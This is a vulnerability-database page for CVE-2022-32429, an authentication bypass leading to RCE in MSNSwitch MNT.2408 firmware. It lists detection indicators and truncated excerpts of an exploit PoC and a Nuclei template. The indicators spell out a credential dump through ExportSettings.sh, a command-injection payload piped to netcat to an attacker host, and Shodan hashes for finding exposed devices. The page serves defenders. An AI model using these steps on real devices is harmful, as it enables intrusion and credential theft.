CVE-2022-32429
published 2022-08-10CVE-2022-32429: An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows…
PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
75.72%
99.5th percentile
An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| megatech | msnswitch_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
yara↗
matchers: word body 'SSID1'; regex header 'filename="Settings(.*).dat' and 'application/octet-stream'; status 200
- →Unauthenticated GET request to /cgi-bin-hax/ExportSettings.sh or /cgi-bin-sdb/ExportSettings.sh — a 200 response containing 'SSID1' and a Content-Disposition header matching 'filename="Settings*.dat' with content-type 'application/octet-stream' confirms the auth-bypass credential dump. ↗
- →RCE is triggered via a GET to /cgi-bin/upgrade.cgi with a crafted firmware_url parameter containing backtick-escaped OS commands piped to netcat (e.g., firmware_url=http://...`CMD|nc HOST PORT`/filename?). ↗
- →Credential extraction: parse the unauthenticated ExportSettings.sh response for lines matching 'Account1=' and 'Password1=' to recover plaintext admin credentials. ↗
- →CSRF token is extracted from /saveUpgrade.asp after authenticated login; look for the pattern '?csrftoken=' in the page body — its presence indicates the device is an MSNSwitch target. ↗
- →Use Shodan favicon hashes to identify exposed MSNSwitch devices on the internet: http.favicon.hash:-2073748627 or http.favicon.hash:-1721140132. ↗
- ·The unauthenticated configuration dump (ExportSettings.sh) only requires HTTP access from any network, but the full RCE via upgrade.cgi requires the attacker to be on the same subnet as the device. ↗
- ·Two distinct vulnerable paths exist: /cgi-bin-sdb/ExportSettings.sh (referenced in the NVD advisory) and /cgi-bin-hax/ExportSettings.sh (used in the working exploit PoC); both should be blocked. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MSNSwitch Firmware MNT.2408 - Remote Code Execution
exploitdb·2022-11-11·CVSS 9.8
CVE-2022-32429 [CRITICAL] MSNSwitch Firmware MNT.2408 - Remote Code Execution
MSNSwitch Firmware MNT.2408 - Remote Code Execution
---
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.
"""
import requests
import sys
import urllib.parse
import readline
import random
import string
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434
# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80
USER
Nuclei
MSNSwitch Firmware MNT.2408 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2022-32429 [CRITICAL] MSNSwitch Firmware MNT.2408 - Authentication Bypass
MSNSwitch Firmware MNT.2408 - Authentication Bypass
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
Template:
id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
author: theabhinavgaur
severity: critical
description: |
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
impact: |
Successful exploitation of this vulnerability allows an
No writeups or analysis indexed.
2022-08-10
Published